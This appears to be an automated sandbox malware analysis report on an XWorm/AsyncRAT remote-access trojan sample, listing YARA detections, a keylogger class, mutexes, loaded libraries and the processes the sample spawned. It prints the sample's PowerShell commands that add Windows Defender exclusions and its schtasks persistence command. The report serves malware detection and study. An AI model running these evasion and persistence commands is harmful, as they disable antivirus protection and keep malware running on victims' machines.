                            Source: powershell.exe, 00000002.00000002.2088403420.000001DF9F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2654881780.00000166E1100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000002.00000002.2088403420.000001DF9F111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDBE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C89C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                            Source: svchost.exe, 00000011.00000003.2799873554.000001FE85440000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2654881780.00000166E1100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000002.00000002.2113954304.000001DFAF182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2237067429.00000191DDC52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398730620.000001D410071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: qmgr.db.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: kj93GnZHBS.exe PID: 728, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED
                            Source: kj93GnZHBS.exe, XLogger.cs.Net Code: KeyboardLayout
                            Source: system log.0.dr, XLogger.cs.Net Code: KeyboardLayout

                            Operating System Destruction

                            barindex
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Source: kj93GnZHBS.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: kj93GnZHBS.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E6155E0_2_00007FF848E6155E
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E66A220_2_00007FF848E66A22
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E61F410_2_00007FF848E61F41
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E65C760_2_00007FF848E65C76
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E61CA10_2_00007FF848E61CA1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F430E98_2_00007FF848F430E9
                            Source: C:\Users\user\AppData\Local\Temp\system logCode function: 15_2_00007FF848E7155E15_2_00007FF848E7155E
                            Source: C:\Users\user\AppData\Local\Temp\system logCode function: 15_2_00007FF848E71CA115_2_00007FF848E71CA1
                            Source: kj93GnZHBS.exe, 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNezur_Interface.exe4 vs kj93GnZHBS.exe
                            Source: kj93GnZHBS.exeBinary or memory string: OriginalFilenameNezur_Interface.exe4 vs kj93GnZHBS.exe
                            Source: kj93GnZHBS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: kj93GnZHBS.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: kj93GnZHBS.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: kj93GnZHBS.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: kj93GnZHBS.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: kj93GnZHBS.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: system log.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: system log.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: system log.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: kj93GnZHBS.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: kj93GnZHBS.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: system log.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: system log.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/25@2/2
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system log.lnkJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\system logMutant created: NULL
                            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
                            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeMutant created: \Sessions\1\BaseNamedObjects\yewSQpt0UEdnjmZz
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_03
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile created: C:\Users\user\AppData\Local\Temp\system logJump to behavior
                            Source: kj93GnZHBS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: kj93GnZHBS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: kj93GnZHBS.exeVirustotal: Detection: 68%
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile read: C:\Users\user\Desktop\kj93GnZHBS.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\kj93GnZHBS.exe "C:\Users\user\Desktop\kj93GnZHBS.exe"
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'kj93GnZHBS.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system log'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\system log "C:\Users\user\AppData\Local\Temp\system log"
                            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'kj93GnZHBS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system log'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log"Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
